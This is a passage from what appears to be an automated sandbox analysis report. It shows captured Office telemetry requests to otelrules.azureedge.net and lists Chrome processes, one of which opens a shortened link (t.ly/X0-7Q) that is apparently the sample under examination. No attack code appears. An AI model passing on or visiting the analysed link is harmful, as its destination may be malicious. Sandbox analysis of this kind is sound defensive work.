                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:27 UTC517INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:27 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1399
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                  ETag: "0x8DC582BE8C605FF"
                                  x-ms-request-id: 5b14ddc3-301e-0033-2bd2-2cfa9c000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154227Z-16547b76f7fkj7j4hC1DFW0a9g0000000fq000000000qdvu
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:27 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  123192.168.2.44987713.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:27 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:27 UTC538INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:27 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1403
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                  ETag: "0x8DC582BDC2EEE03"
                                  x-ms-request-id: 29f76c25-201e-0000-6fd2-2ca537000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154227Z-16547b76f7f4k79zhC1DFWu9y00000000fv000000000gn5z
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:27 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  124192.168.2.44987813.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:27 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  125192.168.2.44987913.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:27 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  126192.168.2.44988013.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:27 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net


                                  Click to jump to process

                                  Click to jump to process

                                  Click to jump to process

                                  Target ID:0
                                  Start time:10:40:58
                                  Start date:12/11/2024
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                  Imagebase:0x7ff76e190000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  Target ID:2
                                  Start time:10:41:01
                                  Start date:12/11/2024
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1948,i,14795089436548518358,10330703935156435624,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                  Imagebase:0x7ff76e190000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  Target ID:3
                                  Start time:10:41:04
                                  Start date:12/11/2024
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.ly/X0-7Q"
                                  Imagebase:0x7ff76e190000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  No disassembly